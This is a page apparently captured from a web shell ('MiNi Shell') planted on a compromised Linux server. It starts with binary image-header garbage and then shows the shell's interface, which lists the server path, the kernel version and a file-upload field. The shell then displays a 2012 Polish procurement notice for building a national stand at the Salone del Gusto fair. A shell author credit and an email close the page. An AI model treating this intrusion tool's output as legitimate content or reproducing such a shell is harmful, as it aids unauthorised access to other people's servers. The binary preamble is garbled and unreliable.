JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120831/324242-N-2012.html

<p class="kh_header"><b>Warszawa: Zakup usług polegających na wykonaniu projektu zabudowy stoiska i zabudowie stoiska na Targach Salone Del Gusto w Turynie, Włochy w terminie od dnia 20.10.2012 r. do dnia 31.10.2012 r.</b><br>
<b>Numer ogłoszenia: 324242 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 623 19 01, faks 22 623 19 09.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług polegających na wykonaniu projektu zabudowy stoiska i zabudowie stoiska na Targach Salone Del Gusto w Turynie, Włochy w terminie od dnia 20.10.2012 r. do dnia 31.10.2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest zakup usług polegających na wykonaniu projektu zabudowy stoiska 
i zabudowie stoiska na Targach Salone Del Gusto w Turynie, Włochy w terminie od dnia 20.10.2012 r. do dnia 31.10.2012 r.

I.	Opis koncepcji zabudowy polskiego stoiska narodowego:

Koncepcja zabudowy ma zostać oparta na harmonijnym zastosowaniu elementów zabudowy, dopasowanych do niej materiałów, organizacji przestrzeni i jej funkcjonalności oraz dodatkowych elementów dekoracyjnych nadających niepowtarzalny charakter całemu stoisku np. rośliny 
w doniczkach. Powierzchnia przeznaczona pod polskie stoisko narodowe wynosi 120 m2 i zostanie podzielona na 5 części uwzględniając przeznaczenie danego fragmentu, jednakże zachowując jednolity charakter zabudowy. Zabudowa stoiska będzie wykonana z materiałów innych niż octanorma, w lekkim, oryginalnym stylu. Wykonawca musi uwzględnić w projekcie oraz zabudowie następujący podział polskiego stoiska:
- pierwsza i zarazem największa część stoiska ma zostać przygotowana pod część restauracyjną wraz z jej wyposażeniem,
- druga część będzie stanowić punkt prezentacyjny tzn. miejsce przystosowane do przygotowywania prezentacji wyrobów i degustacji produktów regionalnych i dań wraz 
z półokrągłą ladą prezentacyjną, która będzie oddzielała miejsce prezentacyjne od publiczności,
- trzecia część ma zostać przeznaczona pod zaplecze kuchenne części restauracyjnej i punktu prezentacyjnego. Wykonawca musi przygotować zaplecze uwzględniając procedury zachowania bezpieczeństwa zgodnie z wymaganiami systemu HACCP,
- czwartą część stanowić będzie miejsce spotkań biznesowych oraz rozmów handlowych przewidziane dla co najmniej 6-10 osób, do wykorzystania przez co najmniej 10 osób,
- piątą część i zarazem najmniejszą musi stanowić zaplecze techniczne przeznaczone do magazynowania różnego rodzaju publikacji, materiałów informacyjnych.

II.	 Opis dotyczący zabudowy polskiego stoiska narodowego

Wykonawca zobowiązany jest do:
1)	wykonania dwóch projektów graficznych zabudowy polskiego stoiska narodowego uwzględniających opis koncepcji i charakter targów, zwanych dalej projektami, 
2)	wykonania zabudowy polskiego stoiska narodowego, czyli montażu i demontażu według projektu,
3)	wyłożenia panelami podłogowymi powierzchni wystawienniczej stoiska,
4)	zapewnienia odpowiedniego oświetlenia stoiska z zastosowaniem gry świateł (iluminacja),
5)	rozprowadzenia instalacji elektrycznej i oświetlenia stoiska,
6)	zapewnienia wyposażenia stoiska w meble wystawiennicze i dekoracyjne, 
7)	zapewnienia monitora plazmowego o wymiarach 52 cale oraz DVD na którym zostaną wyświetlane filmy dotyczące metod wytwarzania polskich produktów zarejestrowanych przez Komisję Europejską lub ubiegających się o rejestrację jako Chroniona Nazwa Pochodzenia, Chronione Oznaczenie Geograficzne lub Gwarantowana Tradycyjna Specjalność oraz obraz z kamery cyfrowej full HD,
8)	zapewnienia kamery cyfrowej full HD, która będzie podłączona do monitora plazmowego na którym wyświetlany będzie aktualny obraz z kamery. Ponadto zarejestrowany materiał, podczas targów, materiał z kamery zostanie przekazany Zamawiającemu na płycie DVD po realizacji zamówienia,
9)	 zapewnienia operatora kamery cyfrowej full HD, który odpowiedzialny będzie za prawidłowo wyświetlany obraz z kamery na monitorze plazmowym,
10)	 organizacji części restauracyjnej wraz z jej wyposażeniem w meble i sprzęt kuchenny,
11)	 organizacji punktu prezentacyjnego z miejscem do przygotowania prezentacji i degustacji produktów regionalnych i dań z półokrągłą ladą prezentacyjną z podstawowym wyposażeniem kuchennym, w tym: piec konwekcyjny parowy  o wymiarach min. 63x63cm, gł. 70cm - 1 szt. (od 5KW, 16A),  przenośna płyta indukcyjna umieszczona na ladzie prezentacyjnej - 2szt. (od 1,8 KW x 2, 16A),
12)	 wbudowania pieca konwencyjnego parowego, o którym mowa w pkt. 12 w ścianę oddzielającą zaplecze kuchenne od punktu prezentacyjnego,
13)	 organizacji zaplecza kuchennego części restauracyjnej oraz punktu prezentacyjnego wyposażonego w meble oraz sprzęt kuchenny w którym będzie się znajdować stanowisko 
z wodą bieżącą (zapewnienie zimnej i ciepłej wody) - zlewozmywak dwukomorowy 
z podgrzewaczem wody (10A) oraz kranem bezdotykowym na fotokomórkę - 1szt., (10A), dostęp do prądu, sprzęt AGD w tym: lodówka 1 szt. o pojemności 200l (od 2KW, 10A), czajnik - 1szt. (od 1,5KW, 10A); piec konwencyjny parowy o wymiarach min. 63x63cm, gł. 70cm - 1szt. (od 5KW, 16A); przenośna płyta indukcyjna - 2 szt. (od 1,8 KW x 2, 16A); umywalka do mycia rąk z podgrzewaczem wody (10A) i kranem bezdotykowym na fotokomórkę - 1 szt. (10A); lada chłodnicza o wymiarach min. szer. 120cm, dł. 210cm -1szt. (od 2KW, 10A),
14)	 przyłączenia wody do zlewozmywaka oraz umywalki z kranem bezdotykowym na fotokomórkę,
15)	 przyłączenia pieców konwencyjno parowych, o których mowa w pkt. 12 i 13  pod okap znajdujący się na zapleczu kuchennym,
16)	 zapewnienia i podłączenia okapu (od 0,8KW, 10A) na zapleczu kuchennym nad przenośnymi płytami indukcyjnymi, o których mowa w pkt. 13 oraz zapewnienie wentylacji,
17)	 zapewnienia wymogów HACCP na stoisku, w tym na zapleczu gastronomicznym,
18)	 organizacji miejsca spotkań i rozmów biznesowych dla co najmniej 6-10 osób wyposażonego w meble,
19)	 organizacji zaplecza technicznego wraz z wyposażeniem w meble, w tym: wieszak na ubrania - 1szt., kosz na śmieci - 1szt., regał z półkami o wymiarach min. 100x50cm, h=100cm - 3szt., stół kwadratowy -1 szt.,
20)	 umieszczenia drzwi oddzielających część wystawienniczą stoiska od zaplecza kuchennego 
i technicznego zamykanych na klucz,
21)	 rozprowadzenia i podłączenie mediów,
22)	 doprowadzenia prądu z przyłącza głównego oraz zapewnienie gniazd elektrycznych, odpowiedniej ilości mocy elektrycznej dostosowanej do sprzętu elektrycznego znajdującego się na stoisku, gniazda elektryczne 24h/24h,
23)	 demontażu stoiska po zakończeniu targów,
24)	 zapewnienia grafiki stoiska w postaci plansz, plakatów, wykonanej na materiałach umożliwiających jej podświetlenie oraz nawiązującej do polskiej tradycji (elementy krajobrazu, elementy przyrodnicze, elementy architektury) i przedstawiającej polskie produkty uczestniczące w systemie Chronionych Nazw Pochodzenia, Chronionych Oznaczeń Geograficznych, Gwarantowanych Tradycyjnych Specjalności,
25)	 sprzątania stoiska przed przekazaniem go Ministerstwu Rolnictwa i Rozwoju Wsi, 
a także w trakcie i po zakończeniu targów oraz po demontażu konstrukcji, 
26)	 zapewnienia obsługi technicznej stoiska w trakcie trwania targów oraz wyposażenia stoiska niezbędnego do prawidłowej realizacji udziału w targach,
27)	 transportu obsługi, ekspozycji, wyposażenia, zapewnienia parkingu podczas rozładunku,
28)	 pokrycia wszelkich opłat obowiązkowych nakładanych przez organizatorów targów Salone del Gusto, w tym kosztów wymaganych pozwoleń, karnetów upoważniających do wejścia 
i wjazdu obsługi stoiska, wywozu śmieci, doprowadzenia i użytkowania energii elektrycznej, wentylacji, pozwoleń dotyczących sprzedaży i degustacji produktów,
29)	 zapewnienia miejsca parkingowego wraz z przyłączem do energii dla samochodu chłodni (od 2KW, 10A) z produktami tradycyjnymi przeznaczonymi do prezentacji oraz degustacji,
30)	 zapewnienia worków biodegradowalnych na śmieci zgodnie z wymaganiami organizatora targów Salone del Gusto,
31)	 wykonania zabudowy z materiałów spełniających warunki zgodne z przepisami bezpieczeństwa i higieny pracy oraz z przepisami z zakresu ochrony przeciwpożarowej,
32)	 umieszczenia na stoisku logo MRiRW - 1 szt., zgodnie z załącznikiem nr 5 do umowy: Logo MRiRW, logo WPHiI - 1 szt. zgodnie z załącznikiem nr 6 do umowy: Logo  WPHiI, logo KSOW - 1 szt. zgodnie z załącznikiem nr 7 do umowy: Logo  KSOW,  rozmieszczenie według projektu,
33)	 zamieszczenia na stoisku logotypów i sloganów zgodnie z załącznikiem nr 4 do umowy: Wykaz logotypów i sloganów,
34)	 umieszczenia na stoisku logo chronionej nazwy pochodzenia oraz chronionego oznaczenia geograficznego według warunków określonych w rozporządzeniu Komisji (WE) nr 628 2008 z dnia 2 lipca 2008 r. zmieniającym rozporządzenie (WE) nr 1898 2006 określające szczegółowe zasady stosowania rozporządzenia Rady (WE) nr 510 2006 
w sprawie ochrony oznaczeń geograficznych i nazw pochodzenia produktów rolnych 
i środków spożywczych Dz. Urz. UE L 173 z 03.07.2008, str. 3,
35)	 umieszczenia na stoisku logo gwarantowanej tradycyjnej specjalności według warunków określonych w rozporządzeniu Komisji (WE) nr 1216 2007 z dnia 18 października 2007r. ustanawiającym szczegółowe zasady wykonania rozporządzenia Rady (WE) nr 509 2006 
w sprawie produktów rolnych i środków spożywczych będących gwarantowanymi tradycyjnymi specjalnościami (Dz. Urz. UE L 275 z 19.10.2007, str. 3),
36)	 umieszczenia na stoisku napisu POLSKA w języku włoskim. 


Powyższy opis zabudowy polskiego stoiska narodowego zostanie wykonany zgodnie 
z koncepcją zabudowy, projektem oraz załącznikiem nr 6 do SIWZ: Przewodnik dla wystawców, jak i z załącznik nr 7 do SIWZ: Organizacja targów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.95.60.00-0, 79.82.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata - w tym okresie, wykonał lub wykonuje, co najmniej 3 (trzy) usługi 
o wartości każdej usługi nie mniejszej niż 250 000,00 zł brutto każda (słownie: dwieście pięćdziesiąt tysięcy złotych 00 100), z których każda polegała na kompleksowej organizacji wystaw, targów, projektów i zabudowy stoisk targowych w tym co najmniej jedna poza granicami kraju. Wykonanie jednej usługi jest równoznaczne z wykonaniem jednej umowy (jednego zamówienia na rzecz jednego Zamawiającego).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą wiedzę i doświadczenie niezbędne do wykonania projektów graficznych i kompleksowej organizacji wystaw, targów.
Wykonawca może zaproponować większą ilość osób uczestniczących w realizacji niniejszego zamówienia, jednakże w takim przypadku, każda osoba wskazana dodatkowo ponad wymagane minimum, musi spełniać powyższy warunek udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fapa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA, ul. Wspólna 30, Kancelaria pok. 235.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 11:00, miejsce: Fundacja Programów Pomocy dla Rolnictwa FAPA, ul. Wspólna 30, Kancelaria pok. 235.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Schemat III Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com